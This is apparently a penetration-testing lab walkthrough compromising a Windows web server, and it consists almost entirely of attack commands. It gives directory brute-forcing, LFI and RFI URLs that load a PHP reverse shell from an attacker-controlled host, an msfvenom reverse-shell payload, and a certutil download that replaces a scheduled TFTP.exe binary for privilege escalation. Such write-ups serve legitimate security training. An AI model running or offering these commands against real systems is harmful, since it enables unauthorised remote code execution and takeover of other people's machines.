8080

Now using feroxbuster:

feroxbuster -u http://192.168.221.53:8080/ -C 404,400 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt' -B --auto-tune

Visiting /site: Checking for LFI vulnerability:

http://192.168.221.53:8080/site/index.php?page=../../../../../../../../../Windows/System32/Drivers/etc/hosts

We also have RFI:

http://192.168.221.53:8080/site/index.php?page=http://192.168.45.236/index.php

Now we can get a php reverse shell from revshells.com: Put it in a file php-reverse-shell.php Now start a python server:

python3 -m uploadserver 80 

Visit this:

http://192.168.221.53:8080/site/index.php?page=http://192.168.45.236/php-reverse-shell.php

Now we get a shell:

Got local.txt from rupert's desktop

Now we find a backup directory:

It TFTP.exe runs every 5 minutes so we can replace it with a reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.228 LPORT=445 -f exe -o rev.exe

Create a reverse shell.

Now we can transfer to the target machine:

python3 -m uploadserver 80

certutil -urlcache -f http://192.168.45.228:/rev.exe TFTP.EXE

Now we get a shell in 5 minutes: